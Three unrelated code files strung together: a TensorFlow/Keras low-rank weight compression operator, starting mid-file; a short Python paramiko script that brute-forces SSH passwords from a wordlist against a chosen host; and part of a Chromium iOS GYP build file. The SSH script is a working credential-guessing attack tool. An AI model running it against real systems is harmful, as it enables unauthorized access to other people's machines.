'c_matrix',
shape=c_matrix.shape,
initializer=layer.kernel_initializer,
regularizer=layer.kernel_regularizer,
constraint=layer.kernel_constraint,
dtype=layer.dtype,
trainable=True)
self.alpha = layer.add_weight(
'alpha',
shape=(),
initializer=tf.keras.initializers.Ones(),
dtype=layer.dtype,
trainable=False)
self.last_alpha_update_step = layer.add_weight(
'last_alpha_update_step',
shape=(),
initializer=tf.keras.initializers.Constant(value=-1),
dtype=tf.int32,
trainable=False)
self.a_matrix_tfvar = a_matrix_tfvar
self.layer.alpha = self.alpha
def compressed_matmul_keras(self, inputs, training=False):
"""Matmul with a convex combination of original and compressed weights."""
if training:
compressed_mat = self.alpha * self.a_matrix_tfvar + (
1 - self.alpha) * tf.matmul(self.b_matrix_tfvar, self.c_matrix_tfvar)
return tf.matmul(inputs, compressed_mat)
else:
# This prevents the TFLite converter from constant-folding the product of
# B & C matrices.
intermediate = tf.matmul(inputs, self.b_matrix_tfvar)
return tf.matmul(intermediate, self.c_matrix_tfvar)
def maybe_run_update_step(self):
"""Creates TensorFlow update op for compression."""
def maybe_update_alpha():
"""Maybe update the alpha param.
Checks if global_step is between begin_compression_step and
end_compression_step, and if the current training step is a
compression step.
Returns:
Boolean tensor whether the training step is a compression step.
"""
is_step_within_compression_range = tf.logical_and(
tf.greater_equal(
tf.cast(self._global_step, tf.int32),
self._spec.begin_compression_step),
tf.logical_or(
tf.less_equal(
tf.cast(self._global_step, tf.int32),
self._spec.end_compression_step),
tf.less(self._spec.end_compression_step, 0)))
is_compression_step = tf.less_equal(
tf.add(self.last_alpha_update_step, self._spec.compression_frequency),
tf.cast(self._global_step, tf.int32))
return tf.logical_and(is_step_within_compression_range,
is_compression_step)
def no_update_op():
pass
def compressor_and_alpha_update_op_fn():
return self._compressor_and_alpha_update_op()
tf.cond(
pred=maybe_update_alpha(),
true_fn=compressor_and_alpha_update_op_fn,
false_fn=no_update_op)
return
def _compressor_op(self, matrix_compressor, a_matrix_tfvar):
"""Creates compressor op based on matrix_compressor.
Meant to create the factors once at begin_compression_step.
Args:
matrix_compressor: specifies the matrix compressor object.
a_matrix_tfvar: the tf tensor to be compressed.
"""
[b_matrix_out, c_matrix_out
] = tf.compat.v1.py_function(matrix_compressor.static_matrix_compressor,
[a_matrix_tfvar], [tf.float32, tf.float32])
self.b_matrix_tfvar.assign(b_matrix_out)
self.c_matrix_tfvar.assign(c_matrix_out)
return
def _update_alpha_op(self):
self.alpha.assign_sub(self._spec.alpha_decrement_value, 0)
self.alpha.assign(tf.math.maximum(self.alpha, 0))
return
def _compressor_and_alpha_update_op(self):
"""Applies compressor and also updates alpha."""
self._compressor_op(self.matrix_compressor, self.a_matrix_tfvar)
self._update_alpha_op()
self.last_alpha_update_step.assign(tf.cast(self._global_step, tf.int32))
def _validate_spec(self):
spec = self._spec
if spec.begin_compression_step < 0:
raise ValueError('Illegal value for begin_compression_step')
if spec.begin_compression_step >= spec.end_compression_step:
if spec.end_compression_step != -1:
raise ValueError(
'Compression must begin before it can end. begin_step=%d, '
'end_step=%d. Set end_compression_step to -1 if compression is '
'required till training stops' %
(spec.begin_compression_step, spec.end_compression_step))
class ApplyCompression(object):
"""Wrapper class.
This is to repeatedly invoke above compression operator to different
layers in a model.
Intialized by specifying the compressor and compression_spec.
After that apply_compression can be called several times for different
matrices in the model.
Finally all_update_op returns the combined update OP from all these
compressions.
"""
def __init__(self, scope, compression_spec, compressor, global_step=None):
"""Initializer.
Args:
scope: TF scope used for creating new TF variables.
compression_spec: compression hyper parameters.
compressor: matrix compressor object of class MatrixCompressorInferface.
global_step: tf variable that has the global step.
"""
logging.info('Entering ApplyCompression constructor')
self._compression_op_spec = compression_spec
self._scope = scope
self._global_step = global_step
self._matrix_compressor = compressor
self._compression_ops = []
self._update_ops = []
self._all_update_op = None
self.uncompressed_size = 0
self.compressed_size = 0
def apply_compression_keras(self,
a_matrix_tfvar,
scope='default_scope',
layer=None):
"""keras version of apply_compression.
Applies matrix compression OP on
a_matrix_tfvar as specified in spec.
Args:
a_matrix_tfvar: TF variable representing a tensor variable in a model.
scope: TF scope used for creating new TF variables.
layer: keras layer object calling this function. Must support an
add_weight method.
Returns:
TF node that represents the compressed version of a_matrix_tfvar.
"""
if self._compression_op_spec.compression_option == 9:
raise NotImplementedError('InputCompression not Supported.')
else:
c = CompressionOp(
scope=scope,
spec=self._compression_op_spec,
global_step=self._global_step,
layer=layer)
c.setup_variables(a_matrix_tfvar, self._matrix_compressor, layer=layer)
return c
def get_operator_hparam(self, hparam):
"""Returns the value of queried hparam of the compression operator."""
return self._compression_op_spec.get(hparam)
def get_compression_ops(self):
"""Returns the compression operators used during the update steps.
Returns:
A list of CompressionOp objects.
"""
return copy.copy(self._compression_ops)
def get_spec(self):
"""Get the spec / hparams used to create the Pruning object."""
return self._compression_op_spec
|
# Libraries
import paramiko
count = 1
def connectSSH(hostname, port, username, passFile):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
with open(passFile, "r") as f:
global count
for password in f.readlines():
password = password.strip()
try:
client.connect(hostname, port=port, username=username, password=password)
print("[" + str(count) + "] " + "[+] Password Success ~ " + password)
print("*" * 50)
print("HostName: " + hostname)
print("UserName: " + username)
print("Password: " + password)
print("*" * 50)
break
except:
print("[" + str(count) + "] " + "[-] Password Failed ~ " + password)
count += 1
hostname = input("[*] Enter HostName: ")
username = input("[*] Enter UserName: ")
passwordFile = input("[*] Enter Passwords File: ")
connectSSH(hostname, 22, username, passwordFile)
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
# GN version: //ios/chrome/app
'target_name': 'ios_chrome_app',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'ios_chrome_browser',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
],
},
'sources': [
'app/UIApplication+ExitsOnSuspend.h',
'app/UIApplication+ExitsOnSuspend.mm',
'app/deferred_initialization_runner.h',
'app/deferred_initialization_runner.mm',
'app/safe_mode_crashing_modules_config.h',
'app/safe_mode_crashing_modules_config.mm',
'app/safe_mode_util.cc',
'app/safe_mode_util.h',
],
},
{
# GN version: //ios/chrome/browser
'target_name': 'ios_chrome_browser',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'../../base/base.gyp:base_prefs',
'../../breakpad/breakpad.gyp:breakpad_client',
'../../components/components.gyp:language_usage_metrics',
'../../components/components.gyp:about_handler',
'../../components/components.gyp:autofill_core_browser',
'../../components/components.gyp:autofill_core_common',
'../../components/components.gyp:autofill_ios_browser',
'../../components/components.gyp:bookmarks_browser',
'../../components/components.gyp:browser_sync_browser',
'../../components/components.gyp:browser_sync_common',
'../../components/components.gyp:certificate_reporting',
'../../components/components.gyp:component_updater',
'../../components/components.gyp:content_settings_core_browser',
'../../components/components.gyp:cookie_config',
'../../components/components.gyp:crash_core_browser',
'../../components/components.gyp:crash_core_common',
'../../components/components.gyp:data_reduction_proxy_core_browser',
'../../components/components.gyp:data_reduction_proxy_core_common',
'../../components/components.gyp:dom_distiller_core',
'../../components/components.gyp:dom_distiller_ios',
'../../components/components.gyp:domain_reliability',
'../../components/components.gyp:enhanced_bookmarks',
'../../components/components.gyp:favicon_base',
'../../components/components.gyp:favicon_core',
'../../components/components.gyp:gcm_driver',
'../../components/components.gyp:google_core_browser',
'../../components/components.gyp:history_core_browser',
'../../components/components.gyp:history_ios_browser',
'../../components/components.gyp:infobars_core',
'../../components/components.gyp:invalidation_impl',
'../../components/components.gyp:invalidation_public',
'../../components/components.gyp:keyed_service_core',
'../../components/components.gyp:keyed_service_ios',
'../../components/components.gyp:leveldb_proto',
'../../components/components.gyp:metrics',
'../../components/components.gyp:metrics_net',
'../../components/components.gyp:metrics_profiler',
'../../components/components.gyp:metrics_services_manager',
'../../components/components.gyp:metrics_ui',
'../../components/components.gyp:net_log',
'../../components/components.gyp:network_time',
'../../components/components.gyp:ntp_snippets',
'../../components/components.gyp:omnibox_browser',
'../../components/components.gyp:open_from_clipboard',
'../../components/components.gyp:password_manager_core_browser',
'../../components/components.gyp:password_manager_sync_browser',
'../../components/components.gyp:pref_registry',
'../../components/components.gyp:proxy_config',
'../../components/components.gyp:rappor',
'../../components/components.gyp:search',
'../../components/components.gyp:search_engines',
'../../components/components.gyp:security_interstitials_core',
'../../components/components.gyp:security_state',
'../../components/components.gyp:sessions_ios',
'../../components/components.gyp:signin_core_browser',
'../../components/components.gyp:signin_core_common',
'../../components/components.gyp:signin_ios_browser',
'../../components/components.gyp:ssl_config',
'../../components/components.gyp:suggestions',
'../../components/components.gyp:sync_driver',
'../../components/components.gyp:syncable_prefs',
'../../components/components.gyp:translate_core_browser',
'../../components/components.gyp:translate_ios_browser',
'../../components/components.gyp:undo_component',
'../../components/components.gyp:update_client',
'../../components/components.gyp:upload_list',
'../../components/components.gyp:variations',
'../../components/components.gyp:variations_service',
'../../components/components.gyp:version_info',
'../../components/components.gyp:version_ui',
'../../components/components.gyp:web_resource',
'../../components/components.gyp:webdata_services',
'../../components/components.gyp:webp_transcode',
'../../components/components_resources.gyp:components_resources',
'../../components/components_strings.gyp:components_strings',
'../../google_apis/google_apis.gyp:google_apis',
'../../net/net.gyp:net',
'../../skia/skia.gyp:skia',
'../../sync/sync.gyp:sync',
'../../third_party/google_toolbox_for_mac/google_toolbox_for_mac.gyp:google_toolbox_for_mac',
'../../ui/base/ui_base.gyp:ui_base',
'../../ui/gfx/gfx.gyp:gfx',
'../../url/url.gyp:url_lib',
'../provider/ios_provider_chrome.gyp:ios_provider_chrome_browser',
'../web/ios_web.gyp:ios_web',
'injected_js',
'ios_chrome_browser_about_flags',
'ios_chrome_common',
'ios_chrome_resources.gyp:ios_chrome_resources',
'ios_chrome_resources.gyp:ios_chrome_ui_string_overrider_factory',
'ios_chrome_resources.gyp:ios_chrome_ui_string_overrider_factory_gen',
],
'export_dependent_settings': [
'../../components/components.gyp:dom_distiller_core',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Accelerate.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreLocation.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
],
},
'sources': [
'browser/app_startup_parameters.h',
'browser/app_startup_parameters.mm',
'browser/application_context.cc',
'browser/application_context.h',
'browser/application_context_impl.cc',
'browser/application_context_impl.h',
'browser/arch_util.cc',
'browser/arch_util.h',
'browser/autocomplete/autocomplete_classifier_factory.cc',
'browser/autocomplete/autocomplete_classifier_factory.h',
'browser/autocomplete/autocomplete_provider_client_impl.cc',
'browser/autocomplete/autocomplete_provider_client_impl.h',
'browser/autocomplete/autocomplete_scheme_classifier_impl.h',
'browser/autocomplete/autocomplete_scheme_classifier_impl.mm',
'browser/autocomplete/in_memory_url_index_factory.cc',
'browser/autocomplete/in_memory_url_index_factory.h',
'browser/autocomplete/shortcuts_backend_factory.cc',
'browser/autocomplete/shortcuts_backend_factory.h',
'browser/autofill/form_input_accessory_view.h',
'browser/autofill/form_input_accessory_view.mm',
'browser/autofill/form_input_accessory_view_controller.h',
'browser/autofill/form_input_accessory_view_controller.mm',
'browser/autofill/form_input_accessory_view_delegate.h',
'browser/autofill/form_suggestion_controller.h',
'browser/autofill/form_suggestion_controller.mm',
'browser/autofill/form_suggestion_label.h',
'browser/autofill/form_suggestion_label.mm',
'browser/autofill/form_suggestion_provider.h',
'browser/autofill/form_suggestion_view.h',
'browser/autofill/form_suggestion_view.mm',
'browser/autofill/form_suggestion_view_client.h',
'browser/autofill/personal_data_manager_factory.cc',
'browser/autofill/personal_data_manager_factory.h',
'browser/bookmarks/bookmark_client_factory.cc',
'browser/bookmarks/bookmark_client_factory.h',
'browser/bookmarks/bookmark_client_impl.cc',
'browser/bookmarks/bookmark_client_impl.h',
'browser/bookmarks/bookmark_model_factory.cc',
'browser/bookmarks/bookmark_model_factory.h',
'browser/bookmarks/bookmarks_utils.cc',
'browser/bookmarks/bookmarks_utils.h',
'browser/bookmarks/startup_task_runner_service_factory.cc',
'browser/bookmarks/startup_task_runner_service_factory.h',
'browser/browser_state/bookmark_model_loaded_observer.cc',
'browser/browser_state/bookmark_model_loaded_observer.h',
'browser/browser_state/browser_state_info_cache.cc',
'browser/browser_state/browser_state_info_cache.h',
'browser/browser_state/browser_state_info_cache_observer.h',
'browser/browser_state/browser_state_keyed_service_factories.h',
'browser/browser_state/browser_state_keyed_service_factories.mm',
'browser/browser_state/browser_state_otr_helper.cc',
'browser/browser_state/browser_state_otr_helper.h',
'browser/browser_state/chrome_browser_state_impl_io_data.cc',
'browser/browser_state/chrome_browser_state_impl_io_data.h',
'browser/browser_state/chrome_browser_state_io_data.cc',
'browser/browser_state/chrome_browser_state_io_data.h',
'browser/browser_state/off_the_record_chrome_browser_state_io_data.h',
'browser/browser_state/off_the_record_chrome_browser_state_io_data.mm',
'browser/browser_state_metrics/browser_state_metrics.cc',
'browser/browser_state_metrics/browser_state_metrics.h',
'browser/browsing_data/ios_chrome_browsing_data_remover.cc',
'browser/browsing_data/ios_chrome_browsing_data_remover.h',
'browser/browsing_data_change_listening.h',
'browser/chrome_constants.cc',
'browser/chrome_constants.h',
'browser/chrome_paths.h',
'browser/chrome_paths.mm',
'browser/chrome_paths_internal.h',
'browser/chrome_switches.cc',
'browser/chrome_switches.h',
'browser/chrome_url_constants.cc',
'browser/chrome_url_constants.h',
'browser/chrome_url_util.h',
'browser/chrome_url_util.mm',
'browser/component_updater/ios_component_updater_configurator.cc',
'browser/component_updater/ios_component_updater_configurator.h',
'browser/content_settings/cookie_settings_factory.cc',
'browser/content_settings/cookie_settings_factory.h',
'browser/content_settings/host_content_settings_map_factory.cc',
'browser/content_settings/host_content_settings_map_factory.h',
'browser/crash_loop_detection_util.h',
'browser/crash_loop_detection_util.mm',
'browser/crash_report/breakpad_helper.h',
'browser/crash_report/breakpad_helper.mm',
'browser/crash_report/crash_keys.cc',
'browser/crash_report/crash_keys.h',
'browser/crash_report/crash_report_background_uploader.h',
'browser/crash_report/crash_report_background_uploader.mm',
'browser/crash_report/crash_report_multi_parameter.h',
'browser/crash_report/crash_report_multi_parameter.mm',
'browser/crash_report/crash_report_user_application_state.h',
'browser/crash_report/crash_report_user_application_state.mm',
'browser/crash_report/crash_upload_list.cc',
'browser/crash_report/crash_upload_list.h',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_io_data.cc',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_io_data.h',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings.cc',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings.h',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings_factory.cc',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings_factory.h',
'browser/dom_distiller/distiller_viewer.cc',
'browser/dom_distiller/distiller_viewer.h',
'browser/dom_distiller/dom_distiller_service_factory.cc',
'browser/dom_distiller/dom_distiller_service_factory.h',
'browser/experimental_flags.h',
'browser/experimental_flags.mm',
'browser/favicon/favicon_client_impl.cc',
'browser/favicon/favicon_client_impl.h',
'browser/favicon/favicon_loader.h',
'browser/favicon/favicon_loader.mm',
'browser/favicon/favicon_service_factory.cc',
'browser/favicon/favicon_service_factory.h',
'browser/favicon/ios_chrome_favicon_loader_factory.h',
'browser/favicon/ios_chrome_favicon_loader_factory.mm',
'browser/favicon/ios_chrome_large_icon_cache_factory.cc',
'browser/favicon/ios_chrome_large_icon_cache_factory.h',
'browser/favicon/ios_chrome_large_icon_service_factory.cc',
'browser/favicon/ios_chrome_large_icon_service_factory.h',
'browser/favicon/large_icon_cache.cc',
'browser/favicon/large_icon_cache.h',
'browser/file_metadata_util.h',
'browser/file_metadata_util.mm',
'browser/find_in_page/find_in_page_controller.h',
'browser/find_in_page/find_in_page_controller.mm',
'browser/find_in_page/find_in_page_model.h',
'browser/find_in_page/find_in_page_model.mm',
'browser/find_in_page/js_findinpage_manager.h',
'browser/find_in_page/js_findinpage_manager.mm',
'browser/first_run/first_run.h',
'browser/first_run/first_run.mm',
'browser/first_run/first_run_configuration.h',
'browser/first_run/first_run_configuration.mm',
'browser/first_run/first_run_metrics.h',
'browser/geolocation/CLLocation+OmniboxGeolocation.h',
'browser/geolocation/CLLocation+OmniboxGeolocation.mm',
'browser/geolocation/CLLocation+XGeoHeader.h',
'browser/geolocation/CLLocation+XGeoHeader.mm',
'browser/geolocation/location_manager.h',
'browser/geolocation/location_manager.mm',
'browser/geolocation/omnibox_geolocation_authorization_alert.h',
'browser/geolocation/omnibox_geolocation_authorization_alert.mm',
'browser/geolocation/omnibox_geolocation_config.h',
'browser/geolocation/omnibox_geolocation_config.mm',
'browser/geolocation/omnibox_geolocation_local_state.h',
'browser/geolocation/omnibox_geolocation_local_state.mm',
'browser/google/google_brand.h',
'browser/google/google_brand.mm',
'browser/google/google_url_tracker_client_impl.cc',
'browser/google/google_url_tracker_client_impl.h',
'browser/google/google_url_tracker_factory.cc',
'browser/google/google_url_tracker_factory.h',
'browser/history/history_backend_client_impl.cc',
'browser/history/history_backend_client_impl.h',
'browser/history/history_client_impl.cc',
'browser/history/history_client_impl.h',
'browser/history/history_service_factory.cc',
'browser/history/history_service_factory.h',
'browser/history/history_utils.cc',
'browser/history/history_utils.h',
'browser/history/top_sites_factory.cc',
'browser/history/top_sites_factory.h',
'browser/history/web_history_service_factory.cc',
'browser/history/web_history_service_factory.h',
'browser/infobars/confirm_infobar_controller.h',
'browser/infobars/confirm_infobar_controller.mm',
'browser/infobars/infobar.h',
'browser/infobars/infobar.mm',
'browser/infobars/infobar_container_ios.h',
'browser/infobars/infobar_container_ios.mm',
'browser/infobars/infobar_container_view.h',
'browser/infobars/infobar_container_view.mm',
'browser/infobars/infobar_controller.h',
'browser/infobars/infobar_controller.mm',
'browser/infobars/infobar_manager_impl.cc',
'browser/infobars/infobar_manager_impl.h',
'browser/infobars/infobar_utils.h',
'browser/infobars/infobar_utils.mm',
'browser/install_time_util.h',
'browser/install_time_util.mm',
'browser/installation_notifier.h',
'browser/installation_notifier.mm',
'browser/interstitials/ios_chrome_controller_client.h',
'browser/interstitials/ios_chrome_controller_client.mm',
'browser/interstitials/ios_chrome_metrics_helper.cc',
'browser/interstitials/ios_chrome_metrics_helper.h',
'browser/interstitials/ios_security_interstitial_page.h',
'browser/interstitials/ios_security_interstitial_page.mm',
'browser/invalidation/ios_chrome_profile_invalidation_provider_factory.cc',
'browser/invalidation/ios_chrome_profile_invalidation_provider_factory.h',
'browser/ios_chrome_field_trials.cc',
'browser/ios_chrome_field_trials.h',
'browser/ios_chrome_io_thread.cc',
'browser/ios_chrome_io_thread.h',
'browser/ios_chrome_main_parts.h',
'browser/ios_chrome_main_parts.mm',
'browser/memory/memory_debugger.h',
'browser/memory/memory_debugger.mm',
'browser/memory/memory_debugger_manager.h',
'browser/memory/memory_debugger_manager.mm',
'browser/memory/memory_metrics.cc',
'browser/memory/memory_metrics.h',
'browser/metrics/field_trial_synchronizer.cc',
'browser/metrics/field_trial_synchronizer.h',
'browser/metrics/ios_chrome_metrics_service_accessor.cc',
'browser/metrics/ios_chrome_metrics_service_accessor.h',
'browser/metrics/ios_chrome_metrics_service_client.cc',
'browser/metrics/ios_chrome_metrics_service_client.h',
'browser/metrics/ios_chrome_metrics_services_manager_client.cc',
'browser/metrics/ios_chrome_metrics_services_manager_client.h',
'browser/metrics/ios_chrome_stability_metrics_provider.cc',
'browser/metrics/ios_chrome_stability_metrics_provider.h',
'browser/metrics/ios_stability_metrics_provider.h',
'browser/metrics/ios_stability_metrics_provider.mm',
'browser/metrics/previous_session_info.h',
'browser/metrics/previous_session_info.mm',
'browser/net/chrome_cookie_store_ios_client.h',
'browser/net/chrome_cookie_store_ios_client.mm',
'browser/net/connection_type_observer_bridge.h',
'browser/net/connection_type_observer_bridge.mm',
'browser/net/cookie_util.h',
'browser/net/cookie_util.mm',
'browser/net/crl_set_fetcher.cc',
'browser/net/crl_set_fetcher.h',
'browser/net/http_server_properties_manager_factory.cc',
'browser/net/http_server_properties_manager_factory.h',
'browser/net/image_fetcher.h',
'browser/net/image_fetcher.mm',
'browser/net/ios_chrome_http_user_agent_settings.cc',
'browser/net/ios_chrome_http_user_agent_settings.h',
'browser/net/ios_chrome_network_delegate.cc',
'browser/net/ios_chrome_network_delegate.h',
'browser/net/ios_chrome_url_request_context_getter.cc',
'browser/net/ios_chrome_url_request_context_getter.h',
'browser/net/metrics_network_client.h',
'browser/net/metrics_network_client.mm',
'browser/net/metrics_network_client_manager.h',
'browser/net/metrics_network_client_manager.mm',
'browser/net/net_types.h',
'browser/net/proxy_service_factory.cc',
'browser/net/proxy_service_factory.h',
'browser/net/retryable_url_fetcher.h',
'browser/net/retryable_url_fetcher.mm',
'browser/ntp_snippets/ios_chrome_ntp_snippets_service_factory.cc',
'browser/ntp_snippets/ios_chrome_ntp_snippets_service_factory.h',
'browser/open_from_clipboard/create_clipboard_recent_content.h',
'browser/open_from_clipboard/create_clipboard_recent_content.mm',
'browser/passwords/credential_manager.h',
'browser/passwords/credential_manager.mm',
'browser/passwords/ios_chrome_password_manager_client.h',
'browser/passwords/ios_chrome_password_manager_client.mm',
'browser/passwords/ios_chrome_password_manager_driver.h',
'browser/passwords/ios_chrome_password_manager_driver.mm',
'browser/passwords/ios_chrome_password_manager_setting_migrator_service_factory.cc',
'browser/passwords/ios_chrome_password_manager_setting_migrator_service_factory.h',
'browser/passwords/ios_chrome_password_store_factory.cc',
'browser/passwords/ios_chrome_password_store_factory.h',
'browser/passwords/ios_chrome_save_password_infobar_delegate.h',
'browser/passwords/ios_chrome_save_password_infobar_delegate.mm',
'browser/passwords/js_credential_manager.h',
'browser/passwords/js_credential_manager.mm',
'browser/passwords/js_password_manager.h',
'browser/passwords/js_password_manager.mm',
'browser/passwords/password_controller.h',
'browser/passwords/password_controller.mm',
'browser/passwords/password_generation_agent.h',
'browser/passwords/password_generation_agent.mm',
'browser/passwords/password_generation_edit_view.h',
'browser/passwords/password_generation_edit_view.mm',
'browser/passwords/password_generation_offer_view.h',
'browser/passwords/password_generation_offer_view.mm',
'browser/passwords/password_generation_prompt_delegate.h',
'browser/passwords/password_generation_utils.h',
'browser/passwords/password_generation_utils.mm',
'browser/passwords/passwords_ui_delegate.h',
'browser/pref_names.cc',
'browser/pref_names.h',
'browser/prefs/browser_prefs.h',
'browser/prefs/browser_prefs.mm',
'browser/prefs/ios_chrome_pref_model_associator_client.cc',
'browser/prefs/ios_chrome_pref_model_associator_client.h',
'browser/prefs/ios_chrome_pref_service_factory.cc',
'browser/prefs/ios_chrome_pref_service_factory.h',
'browser/prefs/pref_observer_bridge.h',
'browser/prefs/pref_observer_bridge.mm',
'browser/procedural_block_types.h',
'browser/search/search_util.cc',
'browser/search/search_util.h',
'browser/search_engines/search_engines_util.cc',
'browser/search_engines/search_engines_util.h',
'browser/search_engines/template_url_service_client_impl.cc',
'browser/search_engines/template_url_service_client_impl.h',
'browser/search_engines/template_url_service_factory.cc',
'browser/search_engines/template_url_service_factory.h',
'browser/search_engines/ui_thread_search_terms_data.cc',
'browser/search_engines/ui_thread_search_terms_data.h',
'browser/services/gcm/ios_chrome_gcm_profile_service_factory.cc',
'browser/services/gcm/ios_chrome_gcm_profile_service_factory.h',
'browser/sessions/ios_chrome_session_tab_helper.cc',
'browser/sessions/ios_chrome_session_tab_helper.h',
'browser/sessions/ios_chrome_tab_restore_service_client.cc',
'browser/sessions/ios_chrome_tab_restore_service_client.h',
'browser/sessions/ios_chrome_tab_restore_service_factory.cc',
'browser/sessions/ios_chrome_tab_restore_service_factory.h',
'browser/signin/about_signin_internals_factory.cc',
'browser/signin/about_signin_internals_factory.h',
'browser/signin/account_consistency_service_factory.h',
'browser/signin/account_consistency_service_factory.mm',
'browser/signin/account_fetcher_service_factory.cc',
'browser/signin/account_fetcher_service_factory.h',
'browser/signin/account_reconcilor_factory.cc',
'browser/signin/account_reconcilor_factory.h',
'browser/signin/account_tracker_service_factory.cc',
'browser/signin/account_tracker_service_factory.h',
'browser/signin/browser_state_data_remover.h',
'browser/signin/browser_state_data_remover.mm',
'browser/signin/chrome_identity_service_observer_bridge.h',
'browser/signin/chrome_identity_service_observer_bridge.mm',
'browser/signin/constants.h',
'browser/signin/constants.mm',
'browser/signin/gaia_auth_fetcher_ios.h',
'browser/signin/gaia_auth_fetcher_ios.mm',
'browser/signin/gaia_auth_fetcher_ios_private.h',
'browser/signin/gaia_cookie_manager_service_factory.cc',
'browser/signin/gaia_cookie_manager_service_factory.h',
'browser/signin/ios_chrome_signin_status_metrics_provider_delegate.cc',
'browser/signin/ios_chrome_signin_status_metrics_provider_delegate.h',
'browser/signin/oauth2_token_service_factory.cc',
'browser/signin/oauth2_token_service_factory.h',
'browser/signin/signin_client_factory.cc',
'browser/signin/signin_client_factory.h',
'browser/signin/signin_client_impl.cc',
'browser/signin/signin_client_impl.h',
'browser/signin/signin_error_controller_factory.cc',
'browser/signin/signin_error_controller_factory.h',
'browser/signin/signin_manager_factory.cc',
'browser/signin/signin_manager_factory.h',
'browser/signin/signin_manager_factory_observer.h',
'browser/signin/signin_util.h',
'browser/signin/signin_util.mm',
'browser/snapshots/lru_cache.h',
'browser/snapshots/lru_cache.mm',
'browser/snapshots/snapshot_cache.h',
'browser/snapshots/snapshot_cache.mm',
'browser/snapshots/snapshot_manager.h',
'browser/snapshots/snapshot_manager.mm',
'browser/snapshots/snapshot_overlay.h',
'browser/snapshots/snapshot_overlay.mm',
'browser/snapshots/snapshots_util.h',
'browser/snapshots/snapshots_util.mm',
'browser/ssl/ios_chrome_security_state_model_client.cc',
'browser/ssl/ios_chrome_security_state_model_client.h',
'browser/ssl/ios_ssl_blocking_page.cc',
'browser/ssl/ios_ssl_blocking_page.h',
'browser/suggestions/image_fetcher_impl.h',
'browser/suggestions/image_fetcher_impl.mm',
'browser/suggestions/suggestions_service_factory.h',
'browser/suggestions/suggestions_service_factory.mm',
'browser/sync/glue/sync_start_util.cc',
'browser/sync/glue/sync_start_util.h',
'browser/sync/ios_chrome_profile_sync_service_factory.cc',
'browser/sync/ios_chrome_profile_sync_service_factory.h',
'browser/sync/ios_chrome_sync_client.cc',
'browser/sync/ios_chrome_sync_client.h',
'browser/sync/ios_chrome_synced_tab_delegate.cc',
'browser/sync/ios_chrome_synced_tab_delegate.h',
'browser/sync/sessions/ios_chrome_local_session_event_router.cc',
'browser/sync/sessions/ios_chrome_local_session_event_router.h',
'browser/sync/sync_observer_bridge.h',
'browser/sync/sync_observer_bridge.mm',
'browser/sync/sync_setup_service.cc',
'browser/sync/sync_setup_service.h',
'browser/sync/sync_setup_service_factory.cc',
'browser/sync/sync_setup_service_factory.h',
'browser/tab_parenting_global_observer.cc',
'browser/tab_parenting_global_observer.h',
'browser/translate/after_translate_infobar_controller.h',
'browser/translate/after_translate_infobar_controller.mm',
'browser/translate/before_translate_infobar_controller.h',
'browser/translate/before_translate_infobar_controller.mm',
'browser/translate/chrome_ios_translate_client.h',
'browser/translate/chrome_ios_translate_client.mm',
'browser/translate/never_translate_infobar_controller.h',
'browser/translate/never_translate_infobar_controller.mm',
'browser/translate/translate_accept_languages_factory.cc',
'browser/translate/translate_accept_languages_factory.h',
'browser/translate/translate_infobar_tags.h',
'browser/translate/translate_message_infobar_controller.h',
'browser/translate/translate_message_infobar_controller.mm',
'browser/translate/translate_service_ios.cc',
'browser/translate/translate_service_ios.h',
'browser/ui/UIView+SizeClassSupport.h',
'browser/ui/UIView+SizeClassSupport.mm',
'browser/ui/animation_util.h',
'browser/ui/animation_util.mm',
'browser/ui/autofill/autofill_client_ios.h',
'browser/ui/autofill/autofill_client_ios.mm',
'browser/ui/autofill/autofill_save_card_infobar.mm',
'browser/ui/background_generator.h',
'browser/ui/background_generator.mm',
'browser/ui/browser_otr_state.h',
'browser/ui/browser_otr_state.mm',
'browser/ui/commands/UIKit+ChromeExecuteCommand.h',
'browser/ui/commands/UIKit+ChromeExecuteCommand.mm',
'browser/ui/commands/clear_browsing_data_command.h',
'browser/ui/commands/clear_browsing_data_command.mm',
'browser/ui/commands/generic_chrome_command.h',
'browser/ui/commands/generic_chrome_command.mm',
'browser/ui/commands/ios_command_ids.h',
'browser/ui/commands/open_url_command.h',
'browser/ui/commands/open_url_command.mm',
'browser/ui/commands/set_up_for_testing_command.h',
'browser/ui/commands/set_up_for_testing_command.mm',
'browser/ui/commands/show_mail_composer_command.h',
'browser/ui/commands/show_mail_composer_command.mm',
'browser/ui/commands/show_signin_command.h',
'browser/ui/commands/show_signin_command.mm',
'browser/ui/file_locations.h',
'browser/ui/file_locations.mm',
'browser/ui/image_util.h',
'browser/ui/image_util.mm',
'browser/ui/keyboard/UIKeyCommand+Chrome.h',
'browser/ui/keyboard/UIKeyCommand+Chrome.mm',
'browser/ui/keyboard/hardware_keyboard_watcher.h',
'browser/ui/keyboard/hardware_keyboard_watcher.mm',
'browser/ui/native_content_controller.h',
'browser/ui/native_content_controller.mm',
'browser/ui/omnibox/web_omnibox_edit_controller.cc',
'browser/ui/omnibox/web_omnibox_edit_controller.h',
'browser/ui/orientation_limiting_navigation_controller.h',
'browser/ui/orientation_limiting_navigation_controller.mm',
'browser/ui/prerender_final_status.h',
